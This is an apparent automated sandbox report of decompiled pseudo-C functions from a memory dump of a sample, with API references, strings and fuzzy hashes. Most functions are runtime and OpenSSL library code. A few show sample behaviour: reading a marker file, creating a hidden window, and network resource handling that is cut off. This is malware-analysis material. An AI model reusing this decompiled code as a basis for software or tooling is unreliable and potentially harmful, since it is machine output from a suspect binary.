				void* _t48;
				signed int _t50;
				signed int _t54;
				signed int _t57;
				intOrPtr _t58;
				intOrPtr _t59;

				_t48 = __edx;
				_t40 = _a4;
				_t65 = _t40;
				if(_t40 != 0) {
					 *_t40 =  *_t40 & 0x00000000;
					_t54 = _a12;
					_t50 = _a8;
					__eflags = _t50;
					if(_t50 == 0) {
						__eflags = _t54;
						if(__eflags == 0) {
							goto L4;
						} else {
							goto L13;
						}
					} else {
						__eflags = _t54;
						if(__eflags == 0) {
							L13:
							_t35 = E00425208(__eflags);
							_t58 = 0x16;
							 *_t35 = _t58;
							E004242D2();
							_t17 = _t58;
							goto L10;
						} else {
							L4:
							__eflags = _t50;
							if(_t50 != 0) {
								 *_t50 = 0;
							}
							_t16 = E00441667(_a16);
							_a4 = _t16;
							__eflags = _t16;
							if(_t16 == 0) {
								L15:
								_t17 = 0;
								goto L10;
							} else {
								_t19 = E0042C160(_t16) + 1;
								 *_t40 = _t19;
								__eflags = _t54;
								if(_t54 == 0) {
									goto L15;
								} else {
									__eflags = _t19 - _t54;
									if(_t19 <= _t54) {
										_t20 = E0042C0FD(_t50, _t54, _a4);
										__eflags = _t20;
										if(_t20 != 0) {
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											E004242FD(_t40, _t48);
											asm("int3");
											_push(0xc);
											_push(0x508078);
											E00428520(_t40, _t50, _t54);
											_v32 = _v32 & 0x00000000;
											_t56 = _a4;
											__eflags = _a4;
											__eflags = 0 | _a4 != 0x00000000;
											if(__eflags != 0) {
												__eflags = E00448FF4(_t56, 0x7fff) - 0x7fff;
												asm("sbb eax, eax");
												if(__eflags == 0) {
													goto L17;
												} else {
													E00428AF7(7);
													_t12 =  &_v8;
													 *_t12 = _v8 & 0x00000000;
													__eflags =  *_t12;
													_t57 = E00441667(_t56);
													_v32 = _t57;
													_v8 = 0xfffffffe;
													E004417FD();
													_t30 = _t57;
												}
											} else {
												L17:
												 *((intOrPtr*)(E00425208(__eflags))) = 0x16;
												E004242D2();
												_t30 = 0;
											}
											return E00428565(_t30);
										} else {
											goto L15;
										}
									} else {
										_t17 = 0x22;
										L10:
										goto L11;
									}
								}
							}
						}
					}
				} else {
					_t37 = E00425208(_t65);
					_t59 = 0x16;
					 *_t37 = _t59;
					E004242D2();
					_t17 = _t59;
					L11:
					return _t17;
				}
			}

0x004416eb
0x004416ef
0x004416f3
0x004416f5
0x0044170a
0x0044170d
0x00441711
0x00441714
0x00441716
0x0044174d
0x0044174f
0x00000000
0x00000000
0x00000000
0x00000000
0x00441718
0x00441718
0x0044171a
0x00441751
0x00441751
0x00441758
0x00441759
0x0044175b
0x00441760
0x00000000
0x0044171c
0x0044171c
0x0044171c
0x0044171e
0x00441720
0x00441720
0x00441726
0x0044172b
0x0044172f
0x00441731
0x00441775
0x00441775
0x00000000
0x00441733
0x00441739
0x0044173a
0x0044173d
0x0044173f
0x00000000
0x00441741
0x00441741
0x00441743
0x00441769
0x00441771
0x00441773
0x0044177b
0x0044177c
0x0044177d
0x0044177e
0x0044177f
0x00441780
0x00441785
0x00441786
0x00441788
0x0044178d
0x00441792
0x00441798
0x0044179b
0x004417a0
0x004417a2
0x004417c6
0x004417c8
0x004417cc
0x00000000
0x004417ce
0x004417d0
0x004417d6
0x004417d6
0x004417d6
0x004417e1
0x004417e3
0x004417e6
0x004417ed
0x004417f2
0x004417f2
0x004417a4
0x004417a4
0x004417a9
0x004417af
0x004417b4
0x004417b4
0x004417f9
0x00000000
0x00000000
0x00000000
0x00441745
0x00441747
0x00441748
0x00000000
0x00441748
0x00441743
0x0044173f
0x00441731
0x0044171a
0x004416f7
0x004416f7
0x004416fe
0x004416ff
0x00441701
0x00441706
0x00441749
0x0044174c
0x0044174c

APIs

__getenv_helper_nolock.LIBCMT ref: 00441726
__invoke_watson.LIBCMT ref: 00441780
_strlen.LIBCMT ref: 00441734

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

_strnlen.LIBCMT ref: 004417BF
__lock.LIBCMT ref: 004417D0
__getenv_helper_nolock.LIBCMT ref: 004417DB

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD

Uniqueness

Uniqueness Score: -1.00%

Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 29%

			E004506A0(void* __ebp, intOrPtr _a4, signed int _a8, intOrPtr _a12, char _a16, char _a80, char _a144, signed int _a208, unsigned int _a216, intOrPtr* _a220, intOrPtr _a224) {
				intOrPtr _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				intOrPtr _t35;
				intOrPtr _t43;
				char* _t46;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr* _t57;
				void* _t65;
				void* _t66;
				intOrPtr* _t67;
				unsigned int _t68;
				void* _t69;
				signed int _t73;
				intOrPtr _t74;
				signed int _t75;
				void* _t76;
				signed int _t77;

				E0042F7C0(0xd4);
				_t29 =  *0x50ad20; // 0x934ff656
				_a208 = _t29 ^ _t75;
				_t54 = _a224;
				_t68 = _a216;
				_t67 = _a220;
				_t73 = _t68 >> 0x0000000c & 0x00000fff;
				_a8 = _t68 & 0x00000fff;
				_a4 = E00450DF0(_t54, _t65, _t67, _t73, _t68);
				_v0 = E00450870(_t54, _t67, _t73, _t68);
				_t35 = E004513B0(_t54, _t65, _t67, _t73, _t68);
				_t76 = _t75 + 0xc;
				_a12 = _t35;
				if(_a4 == 0) {
					_push(_t68 >> 0x18);
					_push("lib(%lu)");
					_push(0x40);
					_push( &_a144);
					E004567A0(_t68 >> 0x18);
					_t76 = _t76 + 0x10;
				}
				_t81 = _v0;
				if(_v0 == 0) {
					_push(_t73);
					_push("func(%lu)");
					_push(0x40);
					_push( &_a80);
					E004567A0(_t81);
					_t76 = _t76 + 0x10;
				}
				_t74 = _a12;
				_t82 = _t74;
				if(_t74 == 0) {
					_push(_a8);
					_push("reason(%lu)");
					_push(0x40);
					_push( &_a16);
					E004567A0(_t82);
					_t76 = _t76 + 0x10;
				}
				_t55 = _v0;
				_t37 =  !=  ? _t74 :  &_a16;
				_push( !=  ? _t74 :  &_a16);
				_t39 =  !=  ? _t55 :  &_a80;
				_push( !=  ? _t55 :  &_a80);
				_t41 =  !=  ? _a4 :  &_a144;
				E004567A0(_a4, _t67, _t54, "error:%08lX:%s:%s:%s", _t68,  !=  ? _a4 :  &_a144);
				_t57 = _t67;
				_t77 = _t76 + 0x1c;
				_t66 = _t57 + 1;
				do {
					_t43 =  *_t57;
					_t57 = _t57 + 1;
				} while (_t43 != 0);
				if(_t57 - _t66 == _t54 - 1 && _t54 > 4) {
					_t69 = 0;
					_t54 = _t54 + _t67;
					do {
						_t46 = E00431C30(_t67, 0x3a);
						_t77 = _t77 + 8;
						if(_t46 == 0 || _t46 > _t54 - 5 + _t69) {
							_t46 = _t54 - 5 + _t69;
							 *_t46 = 0x3a;
						}
						_t69 = _t69 + 1;
						_t67 = _t46 + 1;
					} while (_t69 < 4);
				}
				return E0042A77E(_t54, _a208 ^ _t77, _t66, _t67, _t68);
			}

0x004506a5
0x004506aa
0x004506b1
0x004506b9
0x004506c2
0x004506cc
0x004506de
0x004506e4
0x004506ee
0x004506f8
0x004506fc
0x00450701
0x00450704
0x0045070d
0x0045071b
0x0045071c
0x00450721
0x00450723
0x00450724
0x00450729
0x00450729
0x0045072c
0x00450731
0x00450733
0x00450734
0x0045073d
0x0045073f
0x00450740
0x00450745
0x00450745
0x00450748
0x0045074c
0x0045074e
0x00450750
0x00450758
0x0045075d
0x0045075f
0x00450760
0x00450765
0x00450765
0x00450768
0x00450772
0x00450777
0x0045077c
0x00450783
0x0045078d
0x00450799
0x0045079e
0x004507a0
0x004507a3
0x004507a6
0x004507a6
0x004507a8
0x004507a9
0x004507b4
0x004507bb
0x004507bd
0x004507c0
0x004507c3
0x004507c8
0x004507cd
0x004507db
0x004507dd
0x004507dd
0x004507e0
0x004507e1
0x004507e4
0x004507c0
0x00450801

APIs

___from_strstr_to_strchr.LIBCMT ref: 004507C3

Strings

reason(%lu), xrefs: 00450758
error:%08lX:%s:%s:%s, xrefs: 00450792
func(%lu), xrefs: 00450734
lib(%lu), xrefs: 0045071C

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: ___from_strstr_to_strchr
String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
API String ID: 601868998-2416195885
Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96

Uniqueness

Uniqueness Score: -1.00%

Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E0045AE30(void* __ebx, void* __edx, void* __ebp, char _a4, char _a8) {
				void* __edi;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t40;
				intOrPtr _t43;
				signed int _t44;
				intOrPtr _t51;
				intOrPtr* _t52;
				intOrPtr _t53;

				_t55 = __ebp;
				_t1 =  &_a8; // 0x463967
				_t53 =  *_t1;
				_t2 =  &_a4; // 0x463967
				_t52 =  *_t2;
				_t43 =  *_t52;
				if(_t43 < _t53) {
					__eflags =  *(_t52 + 8) - _t53;
					if( *(_t52 + 8) < _t53) {
						__eflags = _t53 - 0x5ffffffc;
						if(__eflags <= 0) {
							_t44 = _t53 + 3;
							_t50 = 0xaaaaaaab * _t44 >> 0x20;
							_t18 =  *((intOrPtr*)(_t52 + 4));
							_push(__ebx);
							_t40 = 0xaaaaaaab * _t44 >> 0x20 >> 1 << 2;
							__eflags = _t18;
							if(_t18 != 0) {
								_t19 = E00454FB0(_t50, _t18,  *(_t52 + 8), _t40, ".\\crypto\\buffer\\buffer.c", 0xa6);
							} else {
								_t19 = E00454E50(_t40, ".\\crypto\\buffer\\buffer.c", 0xa4);
							}
							_t51 = _t19;
							__eflags = _t51;
							if(__eflags != 0) {
								__eflags = _t53 -  *_t52;
								 *((intOrPtr*)(_t52 + 4)) = _t51;
								 *(_t52 + 8) = _t40;
								E0042B420( *_t52 + _t51, 0, _t53 -  *_t52);
								 *_t52 = _t53;
								return _t53;
							} else {
								E004512D0(_t40, _t51, _t52, _t55, __eflags, 7, 0x69, 0x41, ".\\crypto\\buffer\\buffer.c", 0xa9);
								__eflags = 0;
								return 0;
							}
						} else {
							E004512D0(__ebx, __edx, _t52, __ebp, __eflags, 7, 0x69, 0x41, ".\\crypto\\buffer\\buffer.c", 0x9f);
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags =  *((intOrPtr*)(_t52 + 4)) + _t43;
						E0042B420( *((intOrPtr*)(_t52 + 4)) + _t43, 0, _t53 - _t43);
						 *_t52 = _t53;
						return _t53;
					}
				} else {
					E0042B420( *((intOrPtr*)(_t52 + 4)) + _t53, 0, _t43 - _t53);
					 *_t52 = _t53;
					return _t53;
				}
			}

0x0045ae30
0x0045ae31
0x0045ae31
0x0045ae36
0x0045ae36
0x0045ae3a
0x0045ae3e
0x0045ae5a
0x0045ae5d
0x0045ae7b
0x0045ae81
0x0045aea0
0x0045aea8
0x0045aeaa
0x0045aead
0x0045aeb2
0x0045aeb5
0x0045aeb7
0x0045aedd
0x0045aeb9
0x0045aec4
0x0045aec9
0x0045aee5
0x0045aee7
0x0045aee9
0x0045af0f
0x0045af11
0x0045af1a
0x0045af1e
0x0045af26
0x0045af2d
0x0045aeeb
0x0045aefb
0x0045af03
0x0045af0a
0x0045af0a
0x0045ae83
0x0045ae93
0x0045ae9b
0x0045ae9f
0x0045ae9f
0x0045ae5f
0x0045ae67
0x0045ae6c
0x0045ae74
0x0045ae7a
0x0045ae7a
0x0045ae40
0x0045ae4b
0x0045ae53
0x0045ae59
0x0045ae59

APIs

_memset.LIBCMT ref: 0045AE4B
_memset.LIBCMT ref: 0045AE6C

Strings

.\crypto\buffer\buffer.c, xrefs: 0045AE88, 0045AEBE, 0045AED3, 0045AEF0
g9F, xrefs: 0045AE31, 0045AE36, 0045AE63, 0045AF14, 0045AF1D

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$g9F
API String ID: 2102423945-3653307630
Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9

Uniqueness

Uniqueness Score: -1.00%

Function 00425341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E00425341(void* __ebx, void* __edi, intOrPtr _a4) {
				char* _v24;
				intOrPtr _v28;
				signed int _v36;
				signed int _v40;
				short _v300;
				void* __esi;
				void* _t15;
				void* _t17;
				signed int _t20;
				char* _t22;
				signed int _t30;
				void* _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t49;
				void* _t51;
				signed int _t52;

				if(_a4 != 0) {
					_push(__ebx);
					_t30 = E0043749C(_a4, 0x55);
					if(_t30 < 0x55) {
						_push(__edi);
						_t15 = E00428CDE(_t40, 2 + _t30 * 2);
						_t42 = _t15;
						if(_t42 != 0) {
							_t5 = _t30 + 1; // 0x1
							_t17 = E004374F1(_t42, _t5, _a4, _t5);
							_t52 = _t51 + 0x10;
							if(_t17 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E004242FD(_t30, _t40);
								asm("int3");
								_t49 = _t47;
								_push(_t49);
								_t50 = _t52;
								_t20 =  *0x50ad20; // 0x934ff656
								_v40 = _t20 ^ _t52;
								_t22 = _v24;
								_t45 = _v28;
								if(_v28 <= 5 && _t22 != 0 && MultiByteToWideChar(0, 0, _t22, 0xffffffff,  &_v300, 0x83) != 0) {
									E00425A97(_t30, _t40, _t45,  &_v300);
								}
								_pop(_t46);
								return E0042A77E(_t30, _v36 ^ _t50, _t40, _t42, _t46);
							} else {
								_t15 = _t42;
								goto L5;
							}
						} else {
							L5:
							goto L6;
						}
					} else {
						_t15 = 0;
						L6:
						return _t15;
					}
				} else {
					return 0;
				}
			}

0x00425348
0x0042534e
0x00425359
0x00425360
0x0042536d
0x0042536f
0x00425374
0x00425379
0x0042537f
0x00425388
0x0042538d
0x00425392
0x0042539a
0x0042539b
0x0042539c
0x0042539d
0x0042539e
0x0042539f
0x004253a4
0x004253a8
0x004255d8
0x004255d9
0x004255e1
0x004255e8
0x004255eb
0x004255ef
0x004255f5
0x00425620
0x00425626
0x00425630
0x00425639
0x00425394
0x00425394
0x00000000
0x00425394
0x0042537b
0x0042537b
0x00000000
0x0042537b
0x00425362
0x00425362
0x0042537c
0x0042537e
0x0042537e
0x0042534a
0x0042534d
0x0042534d

APIs

_wcsnlen.LIBCMT ref: 00425354

Strings

U, xrefs: 0042535D

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _wcsnlen
String ID: U
API String ID: 3628947076-3372436214
Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD

Uniqueness

Uniqueness Score: -1.00%

Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00462FF0(intOrPtr* _a4, void _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				signed int _t11;
				signed int _t14;
				intOrPtr* _t15;
				void* _t16;
				signed int _t19;
				intOrPtr _t20;
				signed int _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr* _t33;
				intOrPtr* _t34;
				void* _t36;
				void* _t40;
				void* _t41;

				_t28 = _a16;
				if(_t28 == 0) {
					_t10 = E0047D440();
					_t38 = _a12;
					__eflags = _t10;
					_t24 = _a8;
					_t33 = _a4;
					_t31 =  !=  ? _t10 : "Enter PEM pass phrase:";
					_t11 = E0047D480(_t28, _a12, _t33, 4, _a8,  !=  ? _t10 : "Enter PEM pass phrase:", _a12, _t29);
					_t41 = _t40 + 0x14;
					__eflags = _t11;
					if(__eflags != 0) {
						L9:
						E004512D0(_t24, _t28, _t31, _t38, __eflags, 9, 0x64, 0x6d, ".\\crypto\\pem\\pem_lib.c", 0x6f);
						_t14 = E0042B420(_t33, 0, _t24) | 0xffffffff;
						__eflags = _t14;
					} else {
						do {
							_t15 = _t33;
							_t28 = _t15 + 1;
							do {
								_t26 =  *_t15;
								_t15 = _t15 + 1;
								__eflags = _t26;
							} while (_t26 != 0);
							_t14 = _t15 - _t28;
							__eflags = _t14 - 4;
							if(__eflags < 0) {
								goto L8;
							}
							goto L10;
							L8:
							_push(4);
							_push("phrase is too short, needs to be at least %d chars\n");
							_t16 = E00420E4D();
							E00422408(_t24, _t31, _t33, __eflags);
							_t19 = E0047D480(_t28, _t38, _t33, 4, _t24, _t31, _t38, _t16 + 0x40);
							_t41 = _t41 + 0x20;
							__eflags = _t19;
						} while (__eflags == 0);
						goto L9;
					}
					L10:
					return _t14;
				} else {
					_t34 = _t28;
					_t27 = _t34 + 1;
					do {
						_t20 =  *_t34;
						_t34 = _t34 + 1;
					} while (_t20 != 0);
					_t36 =  >  ? _a8 : _t34 - _t27;
					E0042D8D0(_a4, _t28, _t36);
					return _t36;
				}
			}

0x00462ff0
0x00462ff7
0x00463027
0x0046302c
0x00463030
0x00463032
0x0046303b
0x0046303f
0x00463048
0x0046304d
0x00463050
0x00463052
0x00463095
0x004630a2
0x004630b3
0x004630b3
0x00463054
0x00463054
0x00463054
0x00463056
0x00463060
0x00463060
0x00463062
0x00463063
0x00463063
0x00463067
0x00463069
0x0046306c
0x00000000
0x00000000
0x00000000
0x0046306e
0x0046306e
0x00463070
0x00463075
0x0046307e
0x00463089
0x0046308e
0x00463091
0x00463091
0x00000000
0x00463054
0x004630b6
0x004630ba
0x00462ff9
0x00462ff9
0x00462ffb
0x00463000
0x00463000
0x00463002
0x00463003
0x0046300d
0x00463018
0x00463023
0x00463023

APIs

_fprintf.LIBCMT ref: 0046307E
_memset.LIBCMT ref: 004630AB

Strings

Enter PEM pass phrase:, xrefs: 00463036, 00463043, 00463084
.\crypto\pem\pem_lib.c, xrefs: 00463097
phrase is too short, needs to be at least %d chars, xrefs: 00463070

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _fprintf_memset
String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
API String ID: 3021507156-3399676524
Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040C500(void* __ecx, void* __edx) {
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t4;
				void* _t10;
				void* _t19;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t27;

				_t21 = __edx;
				_t4 =  &_v264;
				_t19 = __ecx;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					_t27 = E004220B6( &_v264, "r");
					__eflags = _t27;
					if(__eflags != 0) {
						_push(_t22);
						_push(2);
						_push(0);
						_push(_t27);
						E0042387F(_t19, _t21, _t22, _t27, __eflags);
						_push(_t27);
						_t10 = E00423455(_t19, _t21, _t22, _t27, __eflags);
						_push(_t27);
						_t23 = _t10;
						E00420CF4(_t19, _t21, _t23, _t27, __eflags);
						__eflags = _t23;
						if(__eflags == 0) {
							L7:
							_push(_t27);
							E00423A38(_t19, _t23, _t27, __eflags);
							__eflags = 0;
							return 0;
						} else {
							__eflags = _t23 - 0x400;
							if(__eflags > 0) {
								goto L7;
							} else {
								E004222F5(_t19, 1, _t23, _t27);
								_push(_t27);
								E00423A38(_t19, _t23, _t27, __eflags);
								return 1;
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}

0x0040c500
0x0040c509
0x0040c519
0x0040c51b
0x0040c523
0x0040c539
0x0040c550
0x0040c555
0x0040c557
0x0040c561
0x0040c562
0x0040c564
0x0040c566
0x0040c567
0x0040c56c
0x0040c56d
0x0040c572
0x0040c573
0x0040c575
0x0040c57d
0x0040c57f
0x0040c5a5
0x0040c5a5
0x0040c5a6
0x0040c5ae
0x0040c5b6
0x0040c581
0x0040c581
0x0040c587
0x00000000
0x0040c589
0x0040c58e
0x0040c593
0x0040c594
0x0040c5a4
0x0040c5a4
0x0040c587
0x0040c559
0x0040c55a
0x0040c560
0x0040c560
0x0040c525
0x0040c52b
0x0040c52b

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539

Strings

bowsakkdestx.txt, xrefs: 0040C52D

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA80(struct HINSTANCE__* __ecx) {
				struct HWND__* _t1;
				struct HWND__* _t6;

				 *0x513244 = __ecx;
				_t1 = CreateWindowExW(0, L"LPCWSTRszWindowClass", L"LPCWSTRszTitle", 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0, __ecx, 0);
				_t6 = _t1;
				if(_t6 != 0) {
					ShowWindow(_t6, 0);
					UpdateWindow(_t6);
					 *0x51323c = _t6;
					return 1;
				} else {
					return _t1;
				}
			}

0x0041baa7
0x0041baad
0x0041bab3
0x0041bab7
0x0041babe
0x0041bac5
0x0041bacb
0x0041bad7
0x0041baba
0x0041baba
0x0041baba

APIs

CreateWindowExW.USER32 ref: 0041BAAD
ShowWindow.USER32(00000000,00000000), ref: 0041BABE
UpdateWindow.USER32(00000000), ref: 0041BAC5

Strings

LPCWSTRszWindowClass, xrefs: 0041BAA0
LPCWSTRszTitle, xrefs: 0041BA9B

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Window$CreateShowUpdate
String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
API String ID: 2944774295-3503800400
Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C

Uniqueness

Uniqueness Score: -1.00%

Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234
sharememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00410BD0(struct _NETRESOURCE* __ecx, intOrPtr* __edx) {
				char _v8;
				signed int _v16;
				intOrPtr _v24;
				signed int _v28;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v92;
				intOrPtr _v96;
				int _v100;
				char _v116;
				signed int _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				void* _v144;
				struct _NETRESOURCE* _v148;
				signed int _v152;
				void* _v156;
				int _v160;
				int _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t88;
				signed int _t89;
				signed int _t91;
				intOrPtr _t103;
				void* _t107;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				void* _t122;
				signed int _t124;
				signed int _t127;
				struct _NETRESOURCE* _t129;
				signed int _t131;
				signed int _t135;
				signed int _t136;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t161;
				intOrPtr* _t164;
				signed int _t167;
				signed int _t168;
				void* _t169;

				_t129 = __ecx;
				_t168 = _t167 & 0xfffffff8;
				_push(0xffffffff);
				_push(0x4cabd6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t168;
				_t169 = _t168 - 0x98;
				_v164 = 0x4000;
